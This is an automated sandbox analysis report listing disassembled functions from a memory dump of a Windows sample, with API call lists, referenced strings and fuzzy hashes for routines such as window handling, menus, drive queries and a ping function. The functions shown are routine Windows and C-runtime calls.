MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CC2F3
GetDlgItem.USER32(?,00000002), ref: 007CC2FE
GetWindowRect.USER32(00000000,?), ref: 007CC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CC364
GetDlgItem.USER32(?,000003E9), ref: 007CC372
GetWindowRect.USER32(00000000,?), ref: 007CC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CC3C6
GetDlgItem.USER32(?,000003EA), ref: 007CC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 007CC3FE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
Instruction ID: 97d3bff26dba557a5557dd0cdcdde3e2cb5c54764f3b479af1e4c4e303968a2c
Opcode Fuzzy Hash: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
Instruction Fuzzy Hash: 58512E71B00205ABDB18CFA9DD99FAEBBBAEF88710F14812DF519D6290DB749D00CB14

Function 0077201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007720D3
KillTimer.USER32(-00000001,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 0077216E
DestroyAcceleratorTable.USER32(00000000), ref: 007ABCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABD0A
DeleteObject.GDI32(00000000), ref: 007ABD1C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 24745fb8d387181067b051902dfb19452b13b1af8bf3e303dab48489c6874977
Instruction ID: 9f81d73e787bd27d408e52d0f473970680413c15d90a11acbe683da73adecb17
Opcode Fuzzy Hash: 24745fb8d387181067b051902dfb19452b13b1af8bf3e303dab48489c6874977
Instruction Fuzzy Hash: 48618D31210A00DFCB359F14D948B3AB7F1FF81352F50C928E5568B972CB78A892DBA0

Function 007721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC

GetSysColor.USER32(0000000F), ref: 007721D3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d7680538dd9b0106e88814d6ac9fc585d084dba0b2164409e98739451f697cc8
Instruction ID: d26e0d7750ccc45f697eedbf6586f608d7097f55121ed2ee3fb0dfcd3f77910d
Opcode Fuzzy Hash: d7680538dd9b0106e88814d6ac9fc585d084dba0b2164409e98739451f697cc8
Instruction Fuzzy Hash: 5B418031104144EADF215F289C88BB93B65FB46371F298265FE798A1E3CB398D42DB15

Function 007DA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,007FF910), ref: 007DA90B
GetDriveTypeW.KERNEL32(00000061,008289A0,00000061), ref: 007DA9D5
_wcscpy.LIBCMT ref: 007DA9FF

Strings

cdrom, xrefs: 007DA927
unknown, xrefs: 007DA996
network, xrefs: 007DA969
all, xrefs: 007DA911
fixed, xrefs: 007DA953
removable, xrefs: 007DA93D
ramdisk, xrefs: 007DA97F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: f0ecb7313a4ec53ab1dc21e8eef9153da5b3167e3e3de18be5d38ca8baf7593c
Instruction ID: a22f31f43e01bf89aae95b09e07faa9f9297151b67851d3276ac51db52a26e22
Opcode Fuzzy Hash: f0ecb7313a4ec53ab1dc21e8eef9153da5b3167e3e3de18be5d38ca8baf7593c
Instruction Fuzzy Hash: 7851AE31118301EFCB04EF14D896A6EB7B5FF84340F10882EF59997392DB79A949CA93

Function 00779837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00779862
__swprintf.LIBCMT ref: 007798AC
__i64tow.LIBCMT ref: 007AF5E6

Strings

0x%p, xrefs: 007AF5C8
%.15g, xrefs: 007798A6
True, xrefs: 007AF5A7
False, xrefs: 007AF5AE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d471ff57930e4ca55b50f5fad7ded3e4f9580a9b4e60c4714bac8a2ce067bf58
Instruction ID: 5fdbf40c197739051b4cbcfe44b983024a5c3d4d1efdddf410e464ff2030f2c0
Opcode Fuzzy Hash: d471ff57930e4ca55b50f5fad7ded3e4f9580a9b4e60c4714bac8a2ce067bf58
Instruction Fuzzy Hash: EA41E571A01205EEDF24DF74D846E7A73E8FF46300F20857EE54DDA292EA3999418B11

Function 007F7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F716A
CreateMenu.USER32 ref: 007F7185
SetMenu.USER32(?,00000000), ref: 007F7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7221
IsMenu.USER32(?), ref: 007F7237
CreatePopupMenu.USER32 ref: 007F7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F726E
DrawMenuBar.USER32 ref: 007F7276

Strings

0, xrefs: 007F7160
F, xrefs: 007F7262

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: cd7b588eb779008d16ec246a7a642a31a27b5da8c55189e2bd7a28e5789ddf42
Instruction ID: aaf20265cab86ef0d08f47fdfd3ee5e8faa598dab62432c172d5782ed1359cf5
Opcode Fuzzy Hash: cd7b588eb779008d16ec246a7a642a31a27b5da8c55189e2bd7a28e5789ddf42
Instruction Fuzzy Hash: 46416A75A01209EFDB24DFA4D884EAABBF5FF48310F144029FA05A7361D735A920CF90

Function 007F74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F755E
CreateCompatibleDC.GDI32(00000000), ref: 007F7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F7578
SelectObject.GDI32(00000000,00000000), ref: 007F7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 007F758B
DeleteDC.GDI32(00000000), ref: 007F7594
GetWindowLongW.USER32(?,000000EC), ref: 007F759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F75BE

Strings

static, xrefs: 007F74F6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 7c2460f65355b3e283000aac9049db33df816bca2ba3da8a62e559ad8092df35
Instruction ID: f8c327428744cfe4769a8114ddfdd8314a01d5d9363566d2f6bb58388f2aba0f
Opcode Fuzzy Hash: 7c2460f65355b3e283000aac9049db33df816bca2ba3da8a62e559ad8092df35
Instruction Fuzzy Hash: CD314D72105219BBDF159F64DC49FFA3B69FF09360F114224FA15962A0CB39D821DBA8

Function 00796E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00796E3E

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

__gmtime64_s.LIBCMT ref: 00796ED7
__gmtime64_s.LIBCMT ref: 00796F0D
__gmtime64_s.LIBCMT ref: 00796F2A
__allrem.LIBCMT ref: 00796F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00796F9C
__allrem.LIBCMT ref: 00796FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00796FD1
__allrem.LIBCMT ref: 00796FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797006
__invoke_watson.LIBCMT ref: 00797077

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: e184e0029a45db4bda2d25b8be4727daae20e71245525f6bb84d0c7ac93633f0
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F971F576A00B16EBDF18AE6CEC45B6AB7A9BF45720F148329F514D7281F778DD008790

Function 007D2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2542
GetMenuItemInfoW.USER32(00835890,000000FF,00000000,00000030), ref: 007D25A3
SetMenuItemInfoW.USER32(00835890,00000004,00000000,00000030), ref: 007D25D9
Sleep.KERNEL32(000001F4), ref: 007D25EB
GetMenuItemCount.USER32(?), ref: 007D262F
GetMenuItemID.USER32(?,00000000), ref: 007D264B
GetMenuItemID.USER32(?,-00000001), ref: 007D2675
GetMenuItemID.USER32(?,?), ref: 007D26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2735

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: dd6337625678a0017991a36f462972603b281f1b06c87f21af9c3a9d51cc84b7
Instruction ID: 28f95f6f5ab3ae5d7b8f847881bb151cc1083daba9c9d01d4862e24919620113
Opcode Fuzzy Hash: dd6337625678a0017991a36f462972603b281f1b06c87f21af9c3a9d51cc84b7
Instruction Fuzzy Hash: 0A618B70900249AFDB21CF64DC88DBE7BB8FB51314F14445AE942A7352DB39AD17DB20

Function 007F6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F6FA8
GetWindowLongW.USER32(?,000000F0), ref: 007F6FCC
_memset.LIBCMT ref: 007F6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F7067

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 8192492faa7dd97659abe9ca3b2e3733d4d7a3c7254c91e6ffdd688fa97e687d
Instruction ID: dfc1837fd7d25f6e53f58682e07a064add08aa3ac285118ec44274cadc3e7254
Opcode Fuzzy Hash: 8192492faa7dd97659abe9ca3b2e3733d4d7a3c7254c91e6ffdd688fa97e687d
Instruction Fuzzy Hash: C2615875900208AFDB10DFA4CC81EFE77B8AF49710F1041AAFA14AB3A1C775A945DBA0

Function 007C6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 007C6C18
VariantInit.OLEAUT32(?), ref: 007C6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 007C6C4A
VariantCopy.OLEAUT32(?,?), ref: 007C6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 007C6CB1
VariantClear.OLEAUT32(?), ref: 007C6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 007C6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C6CDC
VariantClear.OLEAUT32(?), ref: 007C6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C6CF9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 3fb2d3432adcf6551ee08812bab715d491a28703abda79d8fb94f3cf336767ad
Instruction ID: ce581c287e86a21ca87f89bb44a4b9698a01ff9f2e2f55398d614db872e7c09e
Opcode Fuzzy Hash: 3fb2d3432adcf6551ee08812bab715d491a28703abda79d8fb94f3cf336767ad
Instruction Fuzzy Hash: F8414075A00219DFCF10DF64D888EAEBBB9EF08350F00C06DE955A7261CB38E945CBA5

Function 007E5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007E5793
inet_addr.WSOCK32(?,?,?), ref: 007E57D8
gethostbyname.WSOCK32(?), ref: 007E57E4
IcmpCreateFile.IPHLPAPI ref: 007E57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E58ED
WSACleanup.WSOCK32 ref: 007E58F3

Strings

Ping, xrefs: 007E5816

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 886bfdfea70e2f306831fc2747e7234d1993d87ed66639cdea0477c4781ab1a6
Instruction ID: def73966f2d2abb08d30b97603bdf07a07bcd16ca6f419b36aacc66558ae0c55
Opcode Fuzzy Hash: 886bfdfea70e2f306831fc2747e7234d1993d87ed66639cdea0477c4781ab1a6
Instruction Fuzzy Hash: 60518F31605744DFDB10AF25DC49B2AB7E4EF48764F048929F95ADB2A1DB78E800CB42

Function 007DB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DB546
GetLastError.KERNEL32 ref: 007DB550
SetErrorMode.KERNEL32(00000000,READY), ref: 007DB5BD

Strings

READONLY, xrefs: 007DB588
READY, xrefs: 007DB596
INVALID, xrefs: 007DB58F
NOTREADY, xrefs: 007DB57C
UNKNOWN, xrefs: 007DB575

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a8ff07adf6540be4932466330a44e319acf92bfaf6a6b9ee92dee5ca78afed97
Instruction ID: 85a2f214e77ab3d61e5c8a525d3990f58b1d111608cb2c27d2cd07d60ec0daf4
Opcode Fuzzy Hash: a8ff07adf6540be4932466330a44e319acf92bfaf6a6b9ee92dee5ca78afed97
Instruction Fuzzy Hash: 22317E75A00209DFCB00EF68E889ABD7BB4FF08310F11816AF606D7391DB799A51CB51

Function 007C8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9014
GetDlgCtrlID.USER32 ref: 007C901F
GetParent.USER32 ref: 007C903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 007C903E
GetDlgCtrlID.USER32(?), ref: 007C9047
GetParent.USER32(?), ref: 007C9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9066

Strings

ListBox, xrefs: 007C8FD1
ComboBox, xrefs: 007C8F9C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 9871288d80aaa88aa15822c560f8d75770108c0bd9cc87ec8db38caac2350077
Instruction ID: 814096fc3f8988da7f9eb52c2fe0d07f560ca88b5f46032bdc41e776bcddbc06
Opcode Fuzzy Hash: 9871288d80aaa88aa15822c560f8d75770108c0bd9cc87ec8db38caac2350077
Instruction Fuzzy Hash: 0A21B070A00109FBDF04ABA0CC89EBEBB74EF49310F10816DFA21972A1DF7D9855DA24

Function 007C907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C90FD
GetDlgCtrlID.USER32 ref: 007C9108
GetParent.USER32 ref: 007C9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9127
GetDlgCtrlID.USER32(?), ref: 007C9130
GetParent.USER32(?), ref: 007C914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 007C914F

Strings

ListBox, xrefs: 007C90BC
ComboBox, xrefs: 007C9087

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b8d11a79dc54494bc093b061fd09d71a4f4bf83f219a66300fce39c3979e77a9
Instruction ID: 931d6a3e259dc0ee42b3d64867da172697d45169b37d26f3744668504bbc60a2
Opcode Fuzzy Hash: b8d11a79dc54494bc093b061fd09d71a4f4bf83f219a66300fce39c3979e77a9
Instruction Fuzzy Hash: 1F219074A00109FBDF15ABA4CC89FFEBB64EF48300F108059FA55972A1DA7D5855DA24

Function 007C9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007C916F
GetClassNameW.USER32(00000000,?,00000100), ref: 007C9184
